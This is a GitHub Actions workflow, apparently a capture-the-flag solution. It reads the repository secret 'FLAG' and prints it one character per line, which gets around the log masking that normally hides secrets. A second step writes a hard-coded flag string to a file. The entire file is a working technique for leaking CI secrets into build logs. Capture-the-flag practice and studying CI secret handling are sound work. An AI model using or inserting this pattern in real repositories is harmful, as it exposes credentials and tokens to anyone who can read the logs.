name: Print Env Variable

on:
  push

jobs:
  print:
    runs-on: self-hosted

    steps:
      - name: Print Secret
        env:
          MY_VAL: ${{ secrets.FLAG }}
        run: |
          import os
          for q in (os.getenv("MY_VAL")):
            print(q)
        shell: python

      - name: Save
        run: |
          echo "FLAG-2RJSaxHWgP9pYGrbCCav" > flag.txt
        shell: bash

